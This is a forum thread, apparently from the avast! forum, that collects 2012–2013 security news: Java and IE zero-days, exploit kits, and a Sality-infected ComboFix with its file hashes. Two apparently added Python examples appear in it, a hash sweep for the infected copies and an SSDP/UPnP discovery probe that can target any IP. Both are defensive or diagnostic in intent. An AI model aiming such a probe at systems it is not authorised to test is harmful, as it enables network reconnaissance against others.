Security update for Windows lets fonts disappear
http://www.h-online.com/security/news/item/Security-update-for-Windows-lets-fonts-disappear-1771419.html
-
Thank you for the update DJBone.
-
(http://www.gfi.com/blog/wp-content/uploads/2012/12/ransomsurvey2-300x137.png)
Ransomware Locks Desktop with Survey Offers (http://www.gfi.com/blog/ransomware-locks-desktop-with-survey-offers/)
( Is avast! protecting us against this one ??? )
-
Security Alert: SpamSoldier
https://blog.lookout.com/blog/2012/12/17/security-alert-spamsoldier/
-
Adobe Shockwave player provides vulnerable Flash runtime
http://www.kb.cert.org/vuls/id/323161
-
Security update for Windows lets fonts disappear
http://www.h-online.com/security/news/item/Security-update-for-Windows-lets-fonts-disappear-1771419.html
Note: Fix is available now: http://forum.avast.com/index.php?msg=876713
-
Exynos 4 critical security hole affects many Galaxy devices
http://www.h-online.com/open/news/item/Exynos-4-critical-security-hole-affects-many-Galaxy-devices-1770075.html
Samsung to fix Exynos vulnerability in software update 'as quickly as possible'
http://www.androidcentral.com/samsung-fix-exynos-vulnerability-software-update-soon-possible
-
Trojan horse for Linux here: http://www.symantec.com/security_response/writeup.jsp?docid=2012-122012-3441-99&inid=us_sr_carousel (http://www.symantec.com/security_response/writeup.jsp?docid=2012-122012-3441-99&inid=us_sr_carousel)
-
AMD warns of security hole in its Catalyst Control Center
http://www.h-online.com/security/news/item/AMD-warns-of-security-hole-in-its-Catalyst-Control-Center-1773314.html
-
Sudoku and malware with your coffee?
http://nakedsecurity.sophos.com/2012/12/19/sudoku-and-malware-with-your-coffee/
-
nvidia-display-driver-service-attack-escalates-privileges-windows-machines-122712
https://threatpost.com/en_us/blogs/nvidia-display-driver-service-attack-escalates-privileges-windows-machines-122712 (https://threatpost.com/en_us/blogs/nvidia-display-driver-service-attack-escalates-privileges-windows-machines-122712)
Suggest disabling the nvidia display driver service for domain-based machines in particular for the time being until nVidia issues a fix/update.
-
Microsoft "Fix it" available for Internet Explorer 6, 7, and 8
http://blogs.technet.com/b/srd/ (http://blogs.technet.com/b/srd/)
-
SQL injection vulnerability hits all Ruby on Rails versions
http://www.h-online.com/open/news/item/SQL-injection-vulnerability-hits-all-Ruby-on-Rails-versions-1776203.html
-
Microsoft "Fix it" available for Internet Explorer 6, 7, and 8
http://blogs.technet.com/b/srd/ (http://blogs.technet.com/b/srd/)
"Vulnerability in Internet Explorer Could Allow Remote Code Execution"
"Microsoft is aware of targeted attacks that attempt to exploit this vulnerability through Internet Explorer 8."
http://technet.microsoft.com/en-us/security/advisory/2794220
Hey, I'm just a Linux user for the last few years, but maybe Windows users need to know about this stuff?
-
Fatal error leads TURKTRUST to issue dangerous SSL certificates
http://www.h-online.com/security/news/item/Fatal-error-leads-TURKTRUST-to-issue-dangerous-SSL-certificates-1777291.html
http://technet.microsoft.com/en-us/security/advisory/2798897
http://googleonlinesecurity.blogspot.com/2013/01/enhancing-digital-certificate-security.html
https://blog.mozilla.org/security/2013/01/03/revoking-trust-in-two-turktrust-certficates/
-
Microsoft Security Bulletin Advance Notification for January 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-jan
-
Microsoft "Fix it" available for Internet Explorer 6, 7, and 8
http://blogs.technet.com/b/srd/ (http://blogs.technet.com/b/srd/)
Researchers Bypass Microsoft Fix It for IE Zero Day
http://threatpost.com/en_us/blogs/researchers-bypass-microsoft-fix-it-ie-zero-day-010413
http://blog.exodusintel.com/2013/01/04/bypassing-microsofts-internet-explorer-0day-fix-it-patch-for-cve-2012-4792/
http://forum.avast.com/index.php?msg=881171
-
Conficker targets photography lovers (https://www.net-security.org/malware_news.php?id=2368)
"The appliances in question, which “reads” film negatives and reproduces the photos on a computer, have been found to contain the Conficker.B variant."
-
X-mas 2012 exploit hole found for NVidia drivers through which malcreants could take full control of the machine. Patch your drivers here: http://www.geforce.com/
polonus
-
Exynos 4 critical security hole affects many Galaxy devices
http://www.h-online.com/open/news/item/Exynos-4-critical-security-hole-affects-many-Galaxy-devices-1770075.html
Samsung to fix Exynos vulnerability in software update 'as quickly as possible'
http://www.androidcentral.com/samsung-fix-exynos-vulnerability-software-update-soon-possible
Report: Samsung pushes fix for Exynos 4 flaw to Galaxy SIII
http://www.h-online.com/open/news/item/Report-Samsung-pushes-fix-for-Exynos-4-flaw-to-Galaxy-SIII-1778211.html
-
Security Advisory for ColdFusion
http://www.adobe.com/support/security/advisories/apsa13-01.html
-
New Java zero-day actively being abused. Users are advised to disable java inside the browser for now: http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/ link article poster = jaime.blasco
polonus
-
Current Foxit Reader can execute malicious code
http://www.h-online.com/security/news/item/Current-Foxit-Reader-can-execute-malicious-code-1780636.html
http://secunia.com/advisories/51733/
-
Critical vulnerability in Ruby on Rails parameter parsing
http://www.h-online.com/security/news/item/Critical-vulnerability-in-Ruby-on-Rails-parameter-parsing-1780073.html
Exploits for Ruby on Rails holes now in circulation
http://www.h-online.com/open/news/item/Exploits-for-Ruby-on-Rails-holes-now-in-circulation-1781158.html
-
New Java zero-day actively being abused. Users are advised to disable java inside the browser for now: http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/ link article poster = jaime.blasco
Protecting Users Against Java Vulnerability
https://blog.mozilla.org/security/2013/01/11/protecting-users-against-java-vulnerability/
Apple Blocks Java 7 Plug-in on OS X to Address Widespread Security Threat
http://www.macrumors.com/2013/01/11/apple-blocks-java-7-on-os-x-to-address-widespread-security-threat/
-
Hi Asyn,
Well, we all have to wait until coming Tuesday's Oracle patch cycle: http://isc.sans.edu/diary/Oracle+Patch+Tuesday+Pre-Release/14920
Link from SANS Internet Storm Centre, by Stephen Hall (Version: 1), on what is about to be patched,
polonus
-
Hi Asyn,
Well, we all have to wait until coming Tuesday's Oracle patch cycle: http://isc.sans.edu/diary/Oracle+Patch+Tuesday+Pre-Release/14920
Link from SANS Internet Storm Centre, by Stephen Hall (Version: 1), on what is about to be patched,
polonus
Pol, the problem is, there's no Java fix listed (yet).
Neither here, btw: http://www.oracle.com/technetwork/topics/security/cpujan2013-1515902.html
-
MY BAD
-
Hi Asyn,
Well, we all have to wait until coming Tuesday's Oracle patch cycle: http://isc.sans.edu/diary/Oracle+Patch+Tuesday+Pre-Release/14920
Link from SANS Internet Storm Centre, by Stephen Hall (Version: 1), on what is about to be patched,
polonus
Pol, the problem is, there's no Java fix listed (yet).
Neither here, btw: http://www.oracle.com/technetwork/topics/security/cpujan2013-1515902.html
MY BAD
No need to apologize or edit your post. The root problem is that all .jre versions have been found to have legacy code in it that is continuously exploitable down to the kernel level; the only way to mitigate that is to either disable the Java plugin in your browser(s) or remove it entirely or use an operating system resistant to such exploits.
-
Users should watch out for rogue Chrome updates provided by malware sites, as normal Chrome browser updates are performed automatically without any user interaction. See: https://www.virustotal.com/file/19d087ddaadf8fc3d5b8a422dc303e6ea6cdac2a55b4b14e9f28aec9c8902439/analysis/
polonus
-
Microsoft "Fix it" available for Internet Explorer 6, 7, and 8
http://blogs.technet.com/b/srd/
Researchers Bypass Microsoft Fix It for IE Zero Day
http://threatpost.com/en_us/blogs/researchers-bypass-microsoft-fix-it-ie-zero-day-010413
http://blog.exodusintel.com/2013/01/04/bypassing-microsofts-internet-explorer-0day-fix-it-patch-for-cve-2012-4792/
http://forum.avast.com/index.php?msg=881171
Advance Notification for Update to Address Security Advisory 2794220
http://blogs.technet.com/b/msrc/archive/2013/01/13/advance-notification-for-update-to-address-security-advisory-2794220.aspx
-
Oracle patches latest zero-day vulnerabilities in Java
http://www.computerworld.com/s/article/9235696/Oracle_patches_latest_zero_day_vulnerabilities_in_Java
-
The patch is to change the security setting from medium to high... So now the user has to confirm that he wants the script to run... Now how foolproof is that?
-
The patch is to change the security setting from medium to high... So now the user has to confirm that he wants the script to run... Now how foolproof is that?
Now you can put the blame on the user for the infection and hold Oracle blameless. :'(
-
The attack code abusing the vulnerability has been added to exploit kits like Blackhole, Nuclear Pack and Cool Exploit Kit, and also to the Gong Da / Gondad Exploit Pack, read: http://eromang.zataz.com/2013/01/13/gong-da-gondad-exploit-pack-add-java-cve-2013-0422-support/ (link article author Eric Romang)
polonus
-
The patch is to change the security setting from medium to high... So now the user has to confirm that he wants the script to run... Now how foolproof is that?
The patch is to change the security setting from medium to high... So now the user has to confirm that he wants the script to run... Now how foolproof is that?
Now you can put the blame on the user for the infection and hold Oracle blameless. :'(
We can do better than that. All we have to do is remove java completely and avoid this issue entirely. Shame on Oracle for resorting to "fixing" a known exploit that is now being actively exploited in the wild in this way.
This is a "fix" I could have done by myself, no help needed from Oracle. Problem is, do noobies know what to do with the alerts? Probably not. >:( More work for IT staff anyways.
-
The patch is to change the security setting from medium to high... So now the user has to confirm that he wants the script to run... Now how foolproof is that?
The patch is to change the security setting from medium to high... So now the user has to confirm that he wants the script to run... Now how foolproof is that?
Now you can put the blame on the user for the infection and hold Oracle blameless. :'(
We can do better than that. All we have to do is remove java completely and avoid this issue entirely. Shame on Oracle for resorting to "fixing" a known exploit that is now being actively exploited in the wild in this way.
This is a "fix" I could have done by myself, no help needed from Oracle. Problem is, do noobies know what to do with the alerts? Probably not. >:( More work for IT staff anyways.
Confirmed: Java only fixed one of the two bugs
http://immunityproducts.blogspot.ca/2013/01/confirmed-java-only-fixed-one-of-two.html
-
Security Advisory for ColdFusion
http://www.adobe.com/support/security/advisories/apsa13-01.html
Security update: Hotfix available for ColdFusion
http://www.adobe.com/support/security/bulletins/apsb13-03.html
http://helpx.adobe.com/coldfusion/kb/coldfusion-security-hotfix-apsb13-03.html
-
Another Java breach .. Uninstall guys http://krebsonsecurity.com/2013/01/new-java-exploit-fetches-5000-per-buyer/
-
Malware Infecting US Power Plant SCADA Systems
http://www.hotforsecurity.com/blog/malware-infecting-us-power-plant-scada-systems-5050.html
It's already happening here.
BTW, FF has a setting in Tools>Options>Content where one can disable JavaScript within the browser. See essexboy's post above.
Anyone realize that the icons for url and others in the text reply box are java-script based, and will not work or be present when JavaScript is turned off in the browser?
-
BTW, FF has a setting in Tools>Options>Content where one can disable JavaScript within the browser. See essexboy's post above.
Java and JavaScript are two different things..!!
-
BTW, FF has a setting in Tools>Options>Content where one can disable JavaScript within the browser. See essexboy's post above.
Java and JavaScript are two different things..!!
You can also check the following thread for full removal details:
http://forum.avast.com/index.php?topic=19387.msg884597#msg884597
-
BTW, FF has a setting in Tools>Options>Content where one can disable JavaScript within the browser. See essexboy's post above.
Java and JavaScript are two different things..!!
You can also check the following thread for full removal details:
http://forum.avast.com/index.php?topic=19387.msg884597#msg884597
Sorry, guys.
Some things I have yet to learn. Reason I noted javascript in the browser is because without it running, then things such as accessing webmail is not possible unless one uses an older version of it that does not require it, c|net member logon not doable without it, even mediafire will not work without it, Avast text reply box is missing the common icons for text and link enhancement, and so on. Since it is the java plugin from Oracle that is 99% of the problem, have been testing running the browser without javascript and finding it seems to be used in everything everywhere I go.
Do not have java anything installed atm, just so you know. It is apparent that FF, at least, provides their own version of java in the form of a FF javascript and one still needs that to view normal web content within the browser. Just experimenting.
-
BTW, FF has a setting in Tools>Options>Content where one can disable JavaScript within the browser. See essexboy's post above.
Java and JavaScript are two different things..!!
You can also check the following thread for full removal details:
http://forum.avast.com/index.php?topic=19387.msg884597#msg884597
Sorry, guys.
Some things I have yet to learn. Reason I noted javascript in the browser is because without it running, then things such as accessing webmail is not possible unless one uses an older version of it that does not require it, c|net member logon not doable without it, even mediafire will not work without it, Avast text reply box is missing the common icons for text and link enhancement, and so on. Since it is the java plugin from Oracle that is 99% of the problem, have been testing running the browser without javascript and finding it seems to be used in everything everywhere I go.
Do not have java anything installed atm, just so you know. It is apparent that FF, at least, provides their own version of java in the form of a FF javascript and one still needs that to view normal web content within the browser. Just experimenting.
You want to get rid of Java, not JavaScript. They aren't the same. If you get rid of JavaScript, then you'll find that many things will not work.
In Firefox, use NoScript; in Chrome, use FlashControl. Both of these browser add-ons give you the option to either allow or not allow the script for a page that needs it.
-
Microsoft bombs another security test
http://reviews.cnet.com/8301-3667_7-57564385/microsoft-bombs-another-security-test/?ttag=fbwp
-
Microsoft bombs another security test
http://reviews.cnet.com/8301-3667_7-57564385/microsoft-bombs-another-security-test/?ttag=fbwp
And avast! has another good showing. (http://goo.gl/CKRpV) :)
-
Shylock calling Skype
https://www.csis.dk/en/csis/blog/3811/
-
New plugin exploit for Foxit Reader
http://www.pcworld.com/article/2025154/foxit-reader-security-flaw-reportedly-allows-attack.html
Patch is now available within Foxit Reader
Open Foxit Reader GUI > Help > Check For Updates and select Update Version 5.4.5.0114. Alternatively, go to http://www.foxitsoftware.com/Secure_PDF_Reader/ and select the download button 'Free Foxit Reader Download', then uninstall/reboot/install. Either will secure Foxit Reader from outside attack.
-
Two new Java leaks detected: http://archives.neohapsis.com/archives/fulldisclosure/2013-01/0143.html (link author Security Explorations' Adam Gowdiak).
Question is, when is Oracle going to dump Java? This is being predicted to happen soon here: http://www.cio.com/article/727028/Pull_the_Plug_on_Java_Before_It_s_Too_Late?page=2&taxonomyId=3191 (article author = Rob Enderle)
polonus
-
Malware poses as real Java update: http://blog.trendmicro.com/trendlabs-security-intelligence/malware-poses-as-an-update-for-java-0-day-fix/ (link source author = TrendMicro's Rhena Inocencio)
polonus
-
[SE-2012-01] Java 7 Update 11 confirmed to be vulnerable
http://seclists.org/fulldisclosure/2013/Jan/142
-
Hi Asyn,
You have disabled Java, haven't you? We now need ahead-of-the-threat prevention updates...
polonus
-
Hi Asyn,
1. You have disabled Java, haven't you?
2. We now need ahead-of-the-threat prevention updates...
polonus
1. Not only disabled it, I deleted Java a long time ago.
2. I fear, that won't happen...
-
Current Foxit Reader can execute malicious code
http://www.h-online.com/security/news/item/Current-Foxit-Reader-can-execute-malicious-code-1780636.html
http://secunia.com/advisories/51733/
Fixed Foxit Reader released
http://www.h-online.com/security/news/item/Fixed-Foxit-Reader-released-1787736.html
-
Leaked DIY undetected malware generating tool: http://blog.webroot.com/2013/01/18/leaked-diy-malware-generating-tool-spotted-in-the-wild/
link source author Dancho Danchev
polonus
-
Threat alert for APT hack tools used by miscreants: http://blog.trendmicro.com/trendlabs-security-intelligence/throwing-some-light-on-apt-hacktools/
(link article author = Trendmicro's Roland Dela Paz (Threat Researcher))
polonus
-
New Skype Worm Threat - Phorpiex: http://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/
(link article author = TrendMicro's Mark Joseph Manahan (Threat Response Engineer))
polonus
-
Backdoors in many Barracuda appliances
http://www.h-online.com/security/news/item/Backdoors-in-many-Barracuda-appliances-1790947.html
-
Malwarebytes mimic site ‘Malwarebiter(dot)com’ hosts fake anti-malware product and spreads malware.
WARNING: Do NOT visit ‘Malwarebiter(dot)com‘ unless you are using a secured environment (i.e. Virtual Machine or Sandbox)
http://blog.malwarebytes.org/intelligence/2013/01/cta-malwarebiter-com/
-
You cannot trust social media to keep your private data safe: Story of a Twitter vulnerability
http://blog.ioactive.com/2013/01/you-can-not-trust-social-media-twitter-vulnerable.html
-
Security fears over exposure of web-accessible printers
http://www.theage.com.au/it-pro/security-it/security-fears-over-exposure-of-webaccessible-printers-20130129-2dhxo.html
-
Oracle plans to talk down Java security concerns ::)
http://www.h-online.com/security/news/item/Oracle-plans-to-talk-down-Java-security-concerns-1792872.html
-
Oracle plans to talk down Java security concerns ::)
http://www.h-online.com/security/news/item/Oracle-plans-to-talk-down-Java-security-concerns-1792872.html
If you can't fix it, sweep it under the rug. ;D
-
ComboFix infected with Sality virus
http://www.bleepingcomputer.com/forums/topic483431.html
-
ComboFix infected with Sality virus
http://www.bleepingcomputer.com/forums/topic483431.html
Ouch that's bad news
-
ComboFix infected with Sality virus
http://www.bleepingcomputer.com/forums/topic483431.html
Ouch that's bad news
It really is. I PM'd Essexboy, jeff, and magna with the link.
-
ComboFix infected with Sality virus
http://www.bleepingcomputer.com/forums/topic483431.html
Ouch that's bad news
It really is. I PM'd Essexboy, jeff, and magna with the link.
It actually affects all those that received help, if I'm not mistaken. :'(
-
ComboFix infected with Sality virus
http://www.bleepingcomputer.com/forums/topic483431.html
Ouch that's bad news
It really is. I PM'd Essexboy, jeff, and magna with the link.
It actually affects all those that received help, if I'm not mistaken. :'(
Yes. According to Grinler, if a copy of ComboFix has been used for the past couple of days, it would be better to check out the comp.
Copies affected:
SHA256 Hashes
4524611a78ddd40afa7e13238da230302786c546d1f824e6e7dea480a5d55333
e5341c3c32a9726a2d3dd1ac0b90f13d896581ab8707dd0a17431df061a2a71d
4524611a78ddd40afa7e13238da230302786c546d1f824e6e7dea480a5d55333
e95f77fd437b16312fbd66a02fed8b179968a7615c1bd3cd3b2fd86879b4bbc8
Other copies are added later on in the thread.
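As an added example (not code from the BleepingComputer thread or from this forum): a small Python sweep that hashes every .exe under a folder and matches the digests against the three SHA256 values listed above, which is the check Grinler's advice amounts to. The demo files it writes are constructed for the example. Note the limits: an exact-hash match only finds those specific infected copies, and Sality is a file infector that spreads to other executables, so a clean ComboFix.exe does not by itself clear the machine.

```python
import hashlib
import os
import tempfile

# Known-bad SHA256 digests of the Sality-infected ComboFix copies, copied from
# the post above (one digest appears twice there; a set de-duplicates it).
INFECTED_COMBOFIX_SHA256 = frozenset({
    "4524611a78ddd40afa7e13238da230302786c546d1f824e6e7dea480a5d55333",
    "e5341c3c32a9726a2d3dd1ac0b90f13d896581ab8707dd0a17431df061a2a71d",
    "e95f77fd437b16312fbd66a02fed8b179968a7615c1bd3cd3b2fd86879b4bbc8",
})


def sha256_of_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so a large download need not fit in RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_known_bad(root, bad_hashes=INFECTED_COMBOFIX_SHA256, suffixes=(".exe",)):
    """Walk `root`; return [(path, sha256)] for every file whose digest is in `bad_hashes`.

    Only files ending in one of `suffixes` are hashed. Matching is exact: a
    renamed copy is still caught, a modified or re-infected one is not.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_of_file(path)
            except OSError:
                # unreadable or vanished mid-walk: skip rather than abort the sweep
                continue
            if digest.lower() in bad_hashes:
                hits.append((path, digest))
    return hits


def make_demo_tree(root):
    """Write a constructed download folder: one harmless .exe and one text file.

    Returns the digest of the .exe so a caller can feed it back as a 'known bad'
    value and see a match; no real infected sample is written to disk.
    """
    os.makedirs(root, exist_ok=True)
    exe_path = os.path.join(root, "ComboFix.exe")
    with open(exe_path, "wb") as fh:
        fh.write(b"MZ" + b"\x00" * 62 + b"constructed demo payload, not a real binary")
    with open(os.path.join(root, "README.txt"), "w") as fh:
        fh.write("not hashed: wrong suffix\n")
    return sha256_of_file(exe_path)


def run_demo():
    """Sweep a temporary demo tree twice: against the published list, then against the demo digest."""
    with tempfile.TemporaryDirectory() as tmp:
        demo_digest = make_demo_tree(tmp)
        return {
            "demo_digest": demo_digest,
            "against_published": find_known_bad(tmp),
            "against_demo": find_known_bad(tmp, {demo_digest}),
        }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

To use it for real, call `find_known_bad` on the folder where ComboFix was downloaded or run (Downloads, the desktop, C:\ on a system it was executed from) and treat any hit as confirmation that the infected copy was present.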
-
ComboFix infected with Sality virus
http://www.bleepingcomputer.com/forums/topic483431.html
Thanks for the warning..!!
-
It is not that alarming and the situation is not that dramatic overall. Not all instances of Combofix have become infected: http://www.bleepingcomputer.com/forums/topic483431.html
But for non-qualified removal purposes, which we strongly advise against, and in the hands of normal users, Combofix is a no-no at the moment...
polonus
-
Combofix back online now
-
[SE-2012-01] An issue with new Java SE 7 security features
http://seclists.org/fulldisclosure/2013/Jan/241
-
Latest VLC version has dangerous hole
http://www.h-online.com/security/news/item/Latest-VLC-version-has-dangerous-hole-1794474.html
http://www.videolan.org/security/sa1302.html
-
Large Scale Malvertising Campaigns via Clicksor Ad Network try to infect users via Blackhole exploits: http://www.trusteer.com/blog/malvertising-campaigns-get-a-boost-from-unpatched-java-zero-day-exploits (link article author - George Tubin)
polonus
-
avast! blog: Is your home updated? (https://blog.avast.com/2013/01/31/is-your-home-updated/)
-
Java needed to get on the link to SurveyMonkey survey.
-
Howdy bob3160,
Checked this:
Universal Plug and Play
Router Security Check
Scan Results
Congratulations! Your router did not respond to a UPnP discovery request.
Nice to know! Thanks, bob3160...
pol
-
Wait to use VLC Media Player until a new patch for a serious hole via a specially crafted ASF-file
has become available: http://www.videolan.org/security/sa1302.html
Credit for reporting the unpatched vulnerability in the ASF demuxer (libasf_plugin) goes to Debasish Mandal,
polonus
-
Java needed to get on the link to SurveyMonkey survey.
No it requires Javascript which is completely different from JAVA.
-
Wait to use VLC Media Player until a new patch for a serious hole via a specially crafted ASF-file
has become available: http://www.videolan.org/security/sa1302.html
Already posted it. ;) See: http://forum.avast.com/index.php?msg=889517
-
Hi Asyn,
You have beaten me to it. At least now there is no excuse anymore for those that did not temporarily manually disable that libasf_plugin in VLC.
The nightly build already has the patch for this: http://nightlies.videolan.org/
polonus
-
Apple's block on Java blocks ad flow
http://www.theage.com.au/it-pro/security-it/apples-block-on-java-blocks-ad-flow-20130201-2dpix.html
-
Alarming Kaspersky Lab Report: http://www.securelist.com/en/analysis/204792278/Kaspersky_Lab_report_Evaluating_the_threat_level_of_software_vulnerabilities
The situation regarding users with outdated vulnerable Java is really alarming...
polonus
-
Alarming Kaspersky Lab Report: http://www.securelist.com/en/analysis/204792278/Kaspersky_Lab_report_Evaluating_the_threat_level_of_software_vulnerabilities (http://www.securelist.com/en/analysis/204792278/Kaspersky_Lab_report_Evaluating_the_threat_level_of_software_vulnerabilities)
The situation regarding users with outdated vulnerable Java is really alarming...
polonus
Not really alarming, considering the number of people I meet who still have either no or expired AV protection on their system. :(
What makes us think that these people worry about updating even if they receive a notice.
-
Alarming Kaspersky Lab Report: http://www.securelist.com/en/analysis/204792278/Kaspersky_Lab_report_Evaluating_the_threat_level_of_software_vulnerabilities (http://www.securelist.com/en/analysis/204792278/Kaspersky_Lab_report_Evaluating_the_threat_level_of_software_vulnerabilities)
The situation regarding users with outdated vulnerable Java is really alarming...
polonus
Not really alarming, considering the number of people I meet who still have either no or expired AV protection on their system. :(
What makes us think that these people worry about updating even if they receive a notice.
That used to be me, to be quite honest, running no AV, nothing up to date; surprising that during that time I only had 1 virus. :L
-
Hi bob3160,
Completely agree with your analysis. We here became aware why we should update and patch, but the majority of users never ever consider to...totally ignorant bunch. Sounds dramatic and alarming to us, but we are a tiny minority and these are the facts... :(
Hopefully we converted Ddm5 now while he visited these here forums... 8)
polonus
-
Most people don't get religion until they find they are mortal, e.g. they don't worry about security until they have a serious virus/malware infection that deprives them of their computer for a few days and/or costs them money to have fixed.
-
Most people don't get religion until they find they are mortal, e.g. they don't worry about security until they have a serious virus/malware infection that deprives them of their computer for a few days and/or costs them money to have fixed.
Many of the people that have seen my presentation (https://docs.google.com/document/d/1tzuKuKhYPfW_RaXhAYeZiHifOrykTdQwflbGgzwijF4/edit), have also learned the importance of always staying up to date.
Some people you will never convince and they're usually the ones who spread the infections onto their unsuspecting
and uneducated "friends".
-
Android malware carries Windows snooping app
http://www.h-online.com/security/news/item/Android-malware-carries-Windows-snooping-app-1797241.html
http://www.securelist.com/en/blog/805/Mobile_attacks
-
Exclusive: Microsoft and Symantec disrupt cyber crime ring
http://news.yahoo.com/exclusive-software-makers-disrupt-cyber-ring-halt-searches-201207523--finance.html
-
Front company used to sign malware
http://www.h-online.com/security/news/item/Front-company-used-to-sign-malware-1799101.html
http://blog.malwarebytes.org/intelligence/2013/02/digital-certificates-and-malware-a-dangerous-mix/
-
New exploit kit on the block: http://malware.dontneedcoffee.com/2013/02/briefly-wave-whitehole-exploit-kit-hello.html?m=1 (article author = 'Kafeine')
polonus
-
Most people don't get religion until they find they are mortal, e.g. they don't worry about security until they have a serious virus/malware infection that deprives them of their computer for a few days and/or costs them money to have fixed.
Hi bob3160,
Completely agree with your analysis. We here became aware why we should update and patch, but the majority of users never ever consider to...totally ignorant bunch. Sounds dramatic and alarming to us, but we are a tiny minority and these are the facts... :(
Hopefully we converted Ddm5 now while he visited these here forums... 8)
polonus
I guess you could say that David, luckily torrenting actually saved me, twice, but more to the point, as polonus said I guess you could say I'm converted, I update all my things, do AV scans, use appropriate security software, etc, during the time I had that virus I knew something dodgy was going on, so I found the source, but as I said, I got off luckily with having Win7 and Win xp disks at the ready, whenever needed, these days paired with a dban disk. So yea..
-
Massive search fraud botnet seized by Microsoft and Symantec
http://arstechnica.com/security/2013/02/massive-search-fraud-botnet-siezed-by-microsoft-and-symantec/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+arstechnica%2Findex+%28Ars+Technica+-+All+content%29
-
malware disguised as antivirus free
http://www.securelist.com/en/blog?weblogid=208194106
Update Kaspersky crashes and leaves owners of Windows XP without internet
http://translate.google.com.br/translate?sl=pt&tl=en&js=n&prev=_t&hl=pt-BR&ie=UTF-8&eotf=1&u=http%3A%2F%2Fwww.tecmundo.com.br%2Fantivirus%2F36433-atualizacao-do-kaspersky-trava-e-deixa-donos-de-windows-xp-sem-internet.htm
-
Microsoft Security Bulletin Advance Notification for February 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-feb
-
Latest Flash attack coming from China: http://blog.fireeye.com/research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html (link article authors = FireEye researchers Josh Gomez, Thoufique Haq, and Yichong Lin)
polonus
-
Lots of router vulnerabilities, not many patches
http://www.h-online.com/security/news/item/Lots-of-router-vulnerabilities-not-many-patches-1800471.html
-
Updates to February 2013 Critical Patch Update for Java SE
https://blogs.oracle.com/security/entry/updates_to_february_2013_critical
-
Malvertisers infect users with browser with java plug-in: http://www.symantec.com/connect/blogs/malvertising-and-dynamic-dns-never-ending-story
(link article official Symantec blog author = John Harrison) The majority of infected sites are compromised OpenX ad platforms... so, hacked ad sites...
polonus
-
http://www.symantec.com/connect/blogs/cross-platform-frutas-rat-builder-and-back-door (link article author = Val S.)
only 2 detect it in VT,
polonus
-
Lots of router vulnerabilities, not many patches
http://www.h-online.com/security/news/item/Lots-of-router-vulnerabilities-not-many-patches-1800471.html
You can test your router here:
https://www.grc.com/x/ne.dll?bh0bkyd2
Click on "proceed" . Then click on the big button that says " GRC's instant UPnP exposure test". This will tell you if your router is vulnerable.
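As an added example, not GRC's code: what the "UPnP discovery request" in that result actually is. SSDP discovery is a single UDP datagram, an HTTP-style M-SEARCH sent to port 1900; a router that answers it from the WAN side is what the GRC test is looking for. The Python below builds that datagram, parses the reply an exposed device sends back, and can send the probe on your own LAN (the multicast address) or to a specific host you are authorised to test. The reply embedded in the block is constructed, not a capture, and the 192.0.2.1 address is from the documentation range.

```python
import socket

SSDP_MULTICAST = ("239.255.255.250", 1900)

# Constructed example of what an exposed UPnP device answers with; not a real capture.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"EXT:\r\n"
    b"LOCATION: http://192.0.2.1:5000/rootDesc.xml\r\n"
    b"SERVER: Linux/2.6 UPnP/1.0 MiniUPnPd/1.4\r\n"
    b"ST: upnp:rootdevice\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000000::upnp:rootdevice\r\n"
    b"\r\n"
)


def build_msearch(search_target="upnp:rootdevice", mx=2):
    """Return the SSDP M-SEARCH datagram (HTTP over UDP, CRLF line endings)."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        "HOST: 239.255.255.250:1900",
        'MAN: "ssdp:discover"',
        "MX: %d" % mx,
        "ST: %s" % search_target,
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_ssdp_response(raw):
    """Parse a unicast SSDP reply into a dict keyed by upper-cased header name, or None."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.decode("utf-8", errors="replace").split("\r\n")
    if not lines[0].startswith("HTTP/1.1 200"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers


def summarize(headers):
    """Pick out the fields that matter for an exposure check: where the device
    description lives, and what firmware/stack is answering."""
    return {
        "location": headers.get("LOCATION"),
        "server": headers.get("SERVER"),
        "usn": headers.get("USN"),
    }


def probe(target=SSDP_MULTICAST, timeout=2.0):
    """Send one M-SEARCH to `target` and collect every device that answers.

    Network I/O happens only here. The multicast target lists devices on your
    own LAN; a (public_ip, 1900) target from outside reproduces the WAN-side
    check, so only aim it at an address you are allowed to test.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    results = []
    try:
        sock.sendto(build_msearch(), target)
        while True:
            data, (ip, _port) = sock.recvfrom(65535)
            headers = parse_ssdp_response(data)
            if headers is not None:
                results.append((ip, summarize(headers)))
    except socket.timeout:
        pass  # no more replies within the MX window
    finally:
        sock.close()
    return results


if __name__ == "__main__":
    for ip, info in probe():
        print(ip, info)
```

A device that answers is not automatically a vulnerable one, but the LOCATION URL is the next thing to look at: if the description XML (and the control endpoints it lists) are reachable from the Internet, the router is accepting UPnP requests from anyone, which is the exposure the GRC test reports.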
-
Hi Marc57,
Tested there and got the following results: THE EQUIPMENT AT THE TARGET IP ADDRESS
DID NOT RESPOND TO OUR UPnP PROBES!
For what it is worth,
polonus
-
Hi Marc57,
Tested there and got the following results: THE EQUIPMENT AT THE TARGET IP ADDRESS
DID NOT RESPOND TO OUR UPnP PROBES!
For what it is worth,
polonus
I got the same :)
-
That means it's not vulnerable.
-
Thank you, Marc57 for the heads-up on this,
